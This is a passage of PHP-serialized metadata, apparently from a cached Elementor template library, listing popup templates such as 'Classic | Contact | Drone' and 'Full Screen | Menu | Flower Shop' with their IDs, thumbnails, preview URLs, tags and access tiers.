Design\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:38;a:20:{s:4:\"tmpl\";i:1321;s:2:\"id\";i:22759;s:5:\"title\";s:25:\"Classic | Contact | Drone\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/drone-61-small.jpg\";s:12:\"tmpl_created\";i:1647528899;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-contact-drone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:39;a:20:{s:4:\"tmpl\";i:1322;s:2:\"id\";i:22768;s:5:\"title\";s:46:\"Full Screen | Menu | Fashion Stylist Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/62-Fashion-Stylist-Menu.jpg\";s:12:\"tmpl_created\";i:1647529434;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/full-screen-menu-fashion-stylist-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Fashion\",\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:40;a:20:{s:4:\"tmpl\";i:1323;s:2:\"id\";i:22780;s:5:\"title\";s:31:\"Fly-In | CTA | Landscape Design\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/64-Landscape-Design-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647530337;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-landscape-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:41;a:20:{s:4:\"tmpl\";i:1324;s:2:\"id\";i:22790;s:5:\"title\";s:48:\"Bottom Bar  | Contact | Architecture Photography\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/architecture-photography-65-small.jpg\";s:12:\"tmpl_created\";i:1647532358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/bottom-bar-contact-architecture-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:26:\"[\"Architecture\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:42;a:20:{s:4:\"tmpl\";i:1325;s:2:\"id\";i:22800;s:5:\"title\";s:41:\"Fly-In  | CTA | Speech-Language Therapist\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/66-Speech-Language-Therapist-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647532720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/fly-in-cta-speech-language-therapist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:25:\"[\"cta\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:43;a:20:{s:4:\"tmpl\";i:1326;s:2:\"id\";i:22812;s:5:\"title\";s:35:\"Full Screen | Verification | Winery\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/67-Winery-Verification.jpg\";s:12:\"tmpl_created\";i:1647761384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/full-screen-verification-winery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:24:\"[\"Alert\",\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:44;a:20:{s:4:\"tmpl\";i:1327;s:2:\"id\";i:22822;s:5:\"title\";s:36:\"Fly-In | Subscription | Nutritionist\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/nutritionist-69-small.jpg\";s:12:\"tmpl_created\";i:1647762620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-subscription-nutritionist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Food\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:45;a:20:{s:4:\"tmpl\";i:1328;s:2:\"id\";i:22833;s:5:\"title\";s:40:\"Classic | Subscription | App &#038; SaaS\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/app-70-small.jpg\";s:12:\"tmpl_created\";i:1647762955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscription-app-saas/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:14:\"[\"App\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:46;a:20:{s:4:\"tmpl\";i:1329;s:2:\"id\";i:22844;s:5:\"title\";s:41:\"Bottom Bar | Discount | Handmade Cupcakes\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/72-Handmade-Cupcakes-Discount.jpg\";s:12:\"tmpl_created\";i:1647763350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-cupcakes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:21:\"[\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:47;a:20:{s:4:\"tmpl\";i:1330;s:2:\"id\";i:22855;s:5:\"title\";s:40:\"Bottom Bar | Subscription | Fashion Blog\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-blog-75-small.jpg\";s:12:\"tmpl_created\";i:1647763907;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/bottom-bar-subscription-fashion-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:30:\"[\"Blog\",\"Fashion\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:48;a:20:{s:4:\"tmpl\";i:1331;s:2:\"id\";i:22866;s:5:\"title\";s:28:\"Fly-In | CTA | Private Tutor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-77-small.jpg\";s:12:\"tmpl_created\";i:1647764062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-cta-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:49;a:20:{s:4:\"tmpl\";i:1332;s:2:\"id\";i:22876;s:5:\"title\";s:30:\"Classic | CTA | Tennis Academy\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/78-Tennis-Academy-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765192;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-tennis-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:50;a:20:{s:4:\"tmpl\";i:1333;s:2:\"id\";i:22887;s:5:\"title\";s:31:\"Fly-In | CTA | Shared Workspace\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/shared-workspace-79-small.jpg\";s:12:\"tmpl_created\";i:1647765419;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-shared-workspace/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Business\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:51;a:20:{s:4:\"tmpl\";i:1334;s:2:\"id\";i:22899;s:5:\"title\";s:30:\"Bottom Bar | CTA | Art Gallery\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/80-Art-Gallery-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765652;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/bottom-bar-cta-art-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:13:\"[\"Art\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:52;a:20:{s:4:\"tmpl\";i:1335;s:2:\"id\";i:22910;s:5:\"title\";s:44:\"Fly-In | Subscription | Hiking Tours Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/hiking-tours-company-81-small.jpg\";s:12:\"tmpl_created\";i:1647765835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscription-hiking-tours-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Subscribe\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:53;a:20:{s:4:\"tmpl\";i:1336;s:2:\"id\";i:22921;s:5:\"title\";s:26:\"Classic | CTA | Music Band\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/music-band-82-small.jpg\";s:12:\"tmpl_created\";i:1647769462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/classic-cta-music-band/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Marketing\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:54;a:20:{s:4:\"tmpl\";i:1337;s:2:\"id\";i:22935;s:5:\"title\";s:35:\"Classic | CTA | Computer Technician\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/comuter-technician-83-small.jpg\";s:12:\"tmpl_created\";i:1647769843;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-computer-technician/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:55;a:20:{s:4:\"tmpl\";i:1338;s:2:\"id\";i:22945;s:5:\"title\";s:37:\"Classic | Discount | Delivery Company\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/delivery-company-88-small.jpg\";s:12:\"tmpl_created\";i:1647770834;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-delivery-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Discount\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:56;a:20:{s:4:\"tmpl\";i:1339;s:2:\"id\";i:22959;s:5:\"title\";s:29:\"Classic | Discount | Eco Shop\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/echo-shop-89-small.jpg\";s:12:\"tmpl_created\";i:1647771211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-discount-eco-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:57;a:20:{s:4:\"tmpl\";i:1340;s:2:\"id\";i:22972;s:5:\"title\";s:54:\"Fly-In | Subscription | Health &#038; Mindfulness Blog\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small.jpg\";s:12:\"tmpl_created\";i:1647771461;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/fly-in-subscription-health-mindfulness-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:21:\"[\"Health\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:58;a:20:{s:4:\"tmpl\";i:1341;s:2:\"id\";i:22982;s:5:\"title\";s:31:\"Full Screen | Menu | Art Museum\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/art-museum-112-small.jpg\";s:12:\"tmpl_created\";i:1647771938;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-art-museum/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:59;a:20:{s:4:\"tmpl\";i:1342;s:2:\"id\";i:22992;s:5:\"title\";s:40:\"Classic | Discount | Urban Clothing Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small-1.jpg\";s:12:\"tmpl_created\";i:1647773067;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-urban-clothing-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Discount\",\"Ecommerce\",\"Fashion\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:60;a:20:{s:4:\"tmpl\";i:1343;s:2:\"id\";i:23004;s:5:\"title\";s:60:\"Full Screen | Menu | Digital &#038; Technology Design School\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small-1.jpg\";s:12:\"tmpl_created\";i:1647773366;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:155:\"https://library.elementor.com/popups/full-screen-menu-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:61;a:20:{s:4:\"tmpl\";i:1344;s:2:\"id\";i:23015;s:5:\"title\";s:62:\"Bottom Bar | Contact | Digital &#038; Technology Design School\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small.jpg\";s:12:\"tmpl_created\";i:1647773492;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/bottom-bar-contact-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:23:\"[\"Contact\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:62;a:20:{s:4:\"tmpl\";i:1345;s:2:\"id\";i:23025;s:5:\"title\";s:32:\"Full Screen | Menu | Flower Shop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small.jpg\";s:12:\"tmpl_created\";i:1647773820;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:63;a:20:{s:4:\"tmpl\";i:1346;s:2:\"id\";i:23037;s:5:\"title\";s:36:\"Classic | Subscription | Flower Shop\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small-1.jpg\";s:12:\"tmpl_created\";i:1647773949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:64;a:20:{s:4:\"tmpl\";i:1347;s:2:\"id\";i:23056;s:5:\"title\";s:48:\"Classic | Discount | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small-1.jpg\";s:12:\"tmpl_created\";i:1647774468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-discount-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:65;a:20:{s:4:\"tmpl\";i:1348;s:2:\"id\";i:23067;s:5:\"title\";s:37:\"Fly-In | Menu | Baby Sleep 